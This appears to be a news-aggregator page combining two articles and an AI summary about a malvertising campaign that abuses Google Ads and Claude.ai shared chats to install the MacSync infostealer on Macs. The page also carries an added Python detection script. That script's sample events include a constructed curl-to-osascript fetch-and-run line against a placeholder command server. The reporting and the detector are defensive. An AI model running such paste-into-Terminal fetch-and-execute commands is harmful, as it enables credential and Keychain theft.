2 Sources
[1]
Hackers abuse Google ads, Claude.ai chats to push Mac malware
Attackers are abusing Google Ads and legitimate Claude.ai shared chats in an active malvertising campaign. Users searching for "Claude mac download" may come across sponsored search results that list claude.ai as the target website, but lead to instructions that install malware on their Mac.

The campaign was spotted by Berk Albayrak, a security engineer at Trendyol Group, who shared his findings on LinkedIn. Albayrak identified a Claude.ai shared chat that presents itself as an official "Claude Code on Mac" installation guide, attributed to "Apple Support." The chat walks users through opening Terminal and pasting a command, which silently downloads and runs malware on their Mac.

While attempting to verify Albayrak's findings, BleepingComputer landed on a second shared Claude chat carrying out the same attack through entirely separate infrastructure. The two chats follow an identical structure and social engineering approach but use different domains and payloads. Both chats were publicly accessible at the time of writing.

The base64-encoded command shown in the shared Claude chat downloads an encoded shell script from attacker-controlled domains. The 'loader.sh' served by the second chat's infrastructure is a further layer of gzip-compressed shell instructions. This compressed shell script runs entirely in memory, leaving little obvious trace on disk.

The variant BleepingComputer identified starts by checking whether the machine has Russian or CIS-region keyboard input sources configured. If it does, the script exits without doing anything, sending a quiet cis_blocked status ping to the attacker's server on its way out. Only machines that pass this check get the next stage. Before proceeding further, the script also collects the victim's external IP address, hostname, OS version, and keyboard locale, sending all of it back to the attacker. This kind of victim profiling before payload delivery suggests the operators are being selective about who they target.

The script then pulls down a second-stage payload and runs it through osascript, the macOS command-line runner for AppleScript and JavaScript for Automation. This gives the attacker remote code execution without ever dropping a traditional application or binary.

The variant identified by Albayrak, however, appears to skip the profiling steps and goes straight to execution. It harvests browser credentials, cookies, and macOS Keychain contents, packages them up, and exfiltrates them to the attacker's server. Researchers have identified this as a variant of the MacSync macOS infostealer. The briskinternet[.]com domain used by the variant Albayrak identified appeared to be down at the time of writing.

Malvertising has become a recurring delivery mechanism for malware. BleepingComputer has previously reported on similar campaigns targeting users searching for software like GIMP, where a convincing Google ad would list a legitimate-looking domain but take visitors to a lookalike phishing site instead. This campaign flips that, as there is no fake domain to spot. Both Google ads seen here point to Anthropic's real domain, claude.ai, since the attackers are hosting their malicious instructions inside Claude's own shared chat feature. The destination URL in the ad is genuine.

It is not, however, the first time that attackers have abused AI platform shared chats this way. In December, BleepingComputer reported a similar campaign targeting ChatGPT and Grok users.

Users should navigate directly to claude.ai to download the native Claude app, rather than clicking sponsored search results. The legitimate Claude Code CLI is available through Anthropic's official documentation and does not require pasting commands from a chat interface. It is good practice to treat any instructions asking you to paste terminal commands with caution, regardless of where those instructions appear to come from. BleepingComputer reached out to Anthropic and Google for comment prior to publishing.
[2]
Malware is now hiding in Google search ads -- here's how to protect yourself
A new malware campaign has been discovered hiding in people's Google search results when they try to find and download Claude's Mac app. It's a stark reminder of just how pervasive advertisements have become in our day-to-day lives, and why using an ad blocker can be a great way to protect yourself.

Malware has always hidden in ads, but now it can appear directly in your search results

Bad actors have become very good at making malicious downloads look legitimate and even inviting. Sometimes it might be a fake software update, while other times it's a full, convincing copy of a company's support website. And as is the case with a new piece of malware currently making the rounds, it could even be the sponsored ad that appears at the top of your Google search results.

This newest trend is riding on the popularity of AI-powered apps like Claude, which has become hugely popular thanks to its Cowork feature for automating work tasks and to Claude Code. The latest threat targets people looking to use Claude on Mac and was discovered by security engineer Berk Albayrak, who works with the Trendyol Group. Albayrak shared his findings on LinkedIn, noting that the malicious ad pops up when users search for 'Claude download mac' on Google. If you searched for that term and clicked the ad, it would lead you to a legitimate claude.ai shared-chat page that contains instructions for installing the malware. It's a very common way of delivering malware: the page asks you to paste a set of commands into Terminal, which then downloads the malicious files to your device.

But this campaign isn't coming from just one source, either: BleepingComputer also discovered a second shared Claude chat being distributed the same way. What makes malware like this so worrying for everyday people is that it runs entirely in your computer's memory, leaving little trace on disk. That can make it harder to track down and remove.

Ads have become a hotbed for malware, and blocking them is one of the only ways to truly protect yourself

There's no arguing that ads have become rampant on the internet. For many websites and creators, they are a way to keep the lights on. And that reliance on ads for income has made them a perfect vehicle for threat actors looking for some kind of gain.

If you don't use an ad blocker already (and there are reasons some people don't, considering YouTube has launched several campaigns against their use), it might not be a bad idea to set one up. There are several browser extensions you can use to block annoying ads, and most ad blockers have a way to allowlist different sites, so you can still block out the bad while supporting the good. If you're using an Android phone, you can change DNS settings to block ads and other unwanted content, too. Some browsers, like Opera, even come with built-in ad blocking.

Finally, if you're looking for an official download for an app, it's always best to start at the source. And if a page asks you to paste a command into Terminal on Mac or Command Prompt on Windows, it's likely not something you'll want to follow through with, as it could put your device at risk.
A sophisticated malware campaign is targeting Mac users through sponsored Google search results for Claude AI. Attackers are leveraging legitimate Claude.ai shared chat features to distribute malicious Terminal commands disguised as official installation guides. The malware runs in memory to bypass detection and steals browser credentials and Keychain data.
A new malware campaign is exploiting Google Ads and Claude.ai's shared chat feature to distribute Mac malware to unsuspecting users. Security engineer Berk Albayrak from Trendyol Group discovered the attack after users searching for "Claude mac download" encountered sponsored links that appeared to lead to claude.ai but instead directed victims to malicious instructions [1]. What makes this campaign particularly deceptive is that the ads point to Anthropic's legitimate domain rather than a lookalike site, so checking the destination domain, the usual defence against malvertising, gives no warning.
The attackers are hosting their malicious instructions inside Claude.ai's own shared chat feature, presenting fabricated installation guides attributed to "Apple Support." These guides walk users through opening Terminal and pasting commands that silently download and execute malware on their Mac [1]. BleepingComputer identified a second shared Claude chat carrying out the same attack through entirely separate infrastructure, so the campaign is not tied to a single set of domains or payloads [1].

The malicious Terminal commands download encoded shell scripts from attacker-controlled domains. These scripts run entirely in the computer's memory, leaving little trace on disk and making the infection harder to track down and remove [2]. The variant BleepingComputer identified starts by checking whether the machine has Russian or CIS-region keyboard input sources configured. If it finds one, the script exits without doing anything, sending a quiet "cis_blocked" status ping to the attacker's server [1].

Before proceeding with payload delivery, that script collects the victim's external IP address, hostname, OS version, and keyboard locale, sending all of it back to the attacker. This victim profiling before payload delivery suggests the operators are being selective about who they target [1]. The script then pulls down a second-stage payload and runs it through osascript, the macOS command-line runner for AppleScript and JavaScript for Automation, giving the attacker remote code execution without ever dropping a traditional application or binary. The variant Albayrak identified skips the profiling and goes straight to execution [1].

The final payload has been identified as a variant of the MacSync infostealer. It harvests browser credentials, cookies, and macOS Keychain contents, packages them up, and exfiltrates them to the attacker's server [1]. Infostealers of this kind pose significant risks to both individual users and organizations, as stolen credentials can be used for account takeovers, financial fraud, or further network infiltration.

This isn't the first time attackers have weaponized AI platform features. In December, BleepingComputer reported a similar campaign targeting ChatGPT and Grok users through their shared chat features [1]. The tactic represents an evolution in malvertising: instead of registering fake domains, threat actors host their malicious instructions on a legitimate platform's shared-chat feature, behind a trusted URL.

Users should navigate directly to official sources like claude.ai to download native apps rather than clicking sponsored links in search results [1]. The legitimate Claude Code CLI is available through Anthropic's official documentation and does not require pasting Terminal commands from a chat interface. Security experts recommend treating any instructions asking you to paste commands with extreme caution, regardless of where those instructions appear to come from.
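Because the loader stays in memory, the file system offers little to scan; the process tree does not. The following Python detection is an added example, not part of either source article or any vendor product. It flags the chain the summary describes: a decode or fetch utility (base64, gunzip, curl) started in the same shell pipeline as an interpreter (sh, zsh, osascript) under a Terminal session, with osascript reading its script from stdin as an aggravating factor. The process events it runs over are constructed to resemble endpoint telemetry; the field names, PIDs and example.invalid URLs are assumptions, not a real vendor schema or real infrastructure.

```python
"""Process-lineage detection for the in-memory loader chain.

Added example, not from the article. The campaign's loader never writes a
binary to disk, so file-based scanning has little to look at; what it cannot
hide is the process tree: a decode-or-fetch utility (base64, gunzip, curl)
started in the same pipeline as an interpreter (sh, zsh, osascript), under a
Terminal session. The event records below are constructed to resemble what a
macOS EDR or Endpoint Security client would report; field names are
assumptions, not any vendor's schema.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    name: str
    cmdline: str
    ts: float  # seconds since boot (constructed)


SHELLS = {"sh", "bash", "zsh"}
INTERPRETERS = SHELLS | {"osascript"}
FETCHERS = {"curl", "wget"}
DECODERS = {"base64", "gunzip", "gzip"}
PIPELINE_WINDOW = 2.0  # members of one shell pipeline are forked near-simultaneously


def ancestors(by_pid: Dict[int, Proc], pid: int) -> List[str]:
    """Process names from the parent up to the root (cycle-safe)."""
    names, seen = [], set()
    p = by_pid.get(pid)
    while p is not None and p.pid not in seen:
        seen.add(p.pid)
        p = by_pid.get(p.ppid)
        if p is not None:
            names.append(p.name)
    return names


def reads_script_from_stdin(p: Proc) -> bool:
    """osascript with no path, '-' or '-e' takes its script from stdin/argv,
    so no .scpt file is ever written to disk."""
    args = p.cmdline.split()[1:]
    return p.name == "osascript" and (not args or args[0] in ("-", "-e"))


def detect(procs: List[Proc]) -> List[dict]:
    by_pid = {p.pid: p for p in procs}
    children = defaultdict(list)
    for p in procs:
        children[p.ppid].append(p)

    alerts = []
    for p in procs:
        if p.name not in INTERPRETERS:
            continue
        # Pipeline siblings: same parent, started within the window.
        sibs = {s.name for s in children[p.ppid]
                if s.pid != p.pid and abs(s.ts - p.ts) <= PIPELINE_WINDOW}
        fetched, decoded = sibs & FETCHERS, sibs & DECODERS
        if not (fetched or decoded):
            continue
        chain = ancestors(by_pid, p.pid)
        reasons = []
        if decoded:
            reasons.append(f"decoded payload piped into {p.name} via {sorted(decoded)}")
        if fetched:
            reasons.append(f"remote content piped into {p.name} via {sorted(fetched)}")
        if reads_script_from_stdin(p):
            reasons.append("osascript running a script from stdin, nothing on disk")
        alerts.append({
            "pid": p.pid,
            "name": p.name,
            "cmdline": p.cmdline,
            "chain": chain,
            "reasons": reasons,
            # The paste-into-Terminal vector is exactly what this campaign relies on.
            "severity": "high" if "Terminal" in chain else "medium",
        })
    return alerts


# Constructed events: a victim pasting the one-liner, plus benign developer noise.
SAMPLE_EVENTS = [
    Proc(1, 0, "launchd", "/sbin/launchd", 0.0),
    Proc(500, 1, "Terminal", "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", 5.0),
    Proc(501, 500, "zsh", "-zsh", 5.1),
    # echo '<blob>' | base64 -d | gunzip | sh
    Proc(503, 501, "base64", "base64 -d", 10.0),
    Proc(504, 501, "gunzip", "gunzip", 10.0),
    Proc(502, 501, "sh", "sh", 10.0),
    # inside the loader: curl ... | osascript -
    Proc(505, 502, "curl", "curl -fsSL https://c2.example.invalid/stage2.scpt", 10.3),
    Proc(506, 502, "osascript", "osascript -", 10.3),
    # benign: a developer's API check and a scripted backup run from a file
    Proc(510, 500, "zsh", "-zsh", 50.0),
    Proc(511, 510, "curl", "curl -s https://api.example.invalid/health", 60.0),
    Proc(512, 510, "jq", "jq .", 60.0),
    Proc(513, 510, "osascript", "osascript /Users/dev/backup.scpt", 80.0),
]


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a["severity"], a["pid"], a["name"], "<-", "/".join(a["chain"]), a["reasons"])
```

The sibling-within-a-window heuristic is what ties `sh` to the `base64`/`gunzip` that fed it, since the shell itself carries no argument revealing where its script came from. Developers do pipe `curl` into `jq` or `base64 -d` into `tee` all day, which is why only interpreters are candidates and why the rule raises severity rather than blocking.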
Using an ad blocker can provide an additional layer of protection against malware hiding in sponsored search results [2]. Most ad blockers offer allowlist functionality, so users can block malicious ads while still supporting trusted websites. Some browsers, like Opera, even come with built-in ad blocking. For Android users, changing DNS settings can help block ads and other unwanted content [2]. As malvertising campaigns continue to evolve and target users searching for popular software, vigilance when interacting with sponsored search results remains critical for maintaining device security.

Summarized by Navi
[1]
18 Mar 2026•Technology
07 Mar 2026•Technology

11 Dec 2025•Technology
